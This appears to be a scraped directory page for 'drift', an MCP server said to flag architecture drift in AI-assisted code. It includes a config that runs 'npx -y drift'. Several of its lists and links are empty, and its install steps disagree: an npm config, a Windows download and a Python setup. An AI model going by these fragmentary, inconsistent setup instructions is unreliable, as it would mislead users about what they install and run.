lungenemptynester200/drift
Detect architecture drift in AI-assisted codebases with deterministic checks and clear signals
Platform-specific configuration:
{
"mcpServers": {
"drift": {
"command": "npx",
"args": [
"-y",
"drift"
]
}
}
}Add the config above to .claude/settings.json under the mcpServers key.
[](https://github.com/lungenemptynester200/drift)
drift checks code for signs that the design is starting to break down. It looks for:
If you use AI tools, drift helps you spot when the code starts to wander from the shape you want.
Before you run drift on Windows, make sure you have:
If you plan to scan a project, keep the source code folder on your computer as well.
Visit this page to download or get the project files:
If the page includes a release, download the Windows file from there. If it gives you the source files, copy them to your computer first and then run the tool from the project folder.
If the GitHub page gives you a Windows file, do this:
If the GitHub page gives you the source files, do this:
If you are starting from the source files, set up Python first.
Loading reviews...